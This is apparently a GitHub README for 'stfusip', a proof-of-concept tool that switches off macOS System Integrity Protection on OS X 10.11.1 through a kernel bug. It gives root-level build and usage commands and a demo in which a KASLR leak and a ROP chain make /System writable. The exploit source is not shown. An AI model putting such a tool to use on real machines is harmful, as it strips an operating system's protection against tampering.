System Integrity Protection (SIP) bypass for OSX 10.11.1 - 10.11.2 - 10.11.3
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
lib
ropnroll
Makefile
README.md
main.m

README.md

stfusip

credits & thanks

  • jndok – a.k.a. myself, for code and exploit.
  • qwertyoruiop – for bug and related help! go follow him on Twitter :)

compile

Simply do make, inside stfusip folder. If you encounter linking problems, be sure to check that you have capstone installed on your system. There is a flag inside Makefile to specify capstone's include directory, be sure to edit it if capstone is located elsewhere on your system!

If you don't have capstone installed, do:

brew install capstone

and you should be set.

usage

So, stfusip is a simple poc for disabling/enabling SIP, a.k.a. System Integrity Protection, a.k.a. rootless on OSX 10.11.1. Bug could theoretically still work on 10.11.2, but I am really not sure.

Super easy to use, needs to be run as root!:

sudo ./stfusip disable /* this disables SIP */
sudo ./stfusip enable  /* this enables SIP */

Here's a demo output:

jndoks-Mac-Pro:stfusip jndok$ sudo su
sh-3.2# whoami
root
sh-3.2# touch /System/yolo
touch: /System/yolo: Operation not permitted
sh-3.2# ./stfusip disable
[+] kaslr slide is: 0x0000000c600000
[+] built ROP chain @ 0xbff56c90 (mapped @ 0x261)!
[+] trigger set: 0x18 : 0xffffff800c8c41bf

[-] System Integrity Protection (SIP) has been disabled.
sh-3.2# touch /System/yolo
sh-3.2# ls -ls /System/
total 0
0 drwxr-xr-x  74 root  wheel  2516 Dec  7 09:43 Library
0 -rw-r--r--   1 root  wheel     0 Dec  7 15:46 yolo
sh-3.2# rm -rf /System/yolo
sh-3.2# ls -ls /System/
total 0
0 drwxr-xr-x  74 root  wheel  2516 Dec  7 09:43 Library
sh-3.2# ./stfusip enable
[+] kaslr slide is: 0x0000000c600000
[+] built ROP chain @ 0xbfff6c90 (mapped @ 0x261)!
[+] trigger set: 0x18 : 0xffffff800c8c41bf

touch: /System/test: Operation not permitted
[+] System Integrity Protection (SIP) has been enabled.
sh-3.2# touch /System/yolo
touch: /System/yolo: Operation not permitted
sh-3.2# exit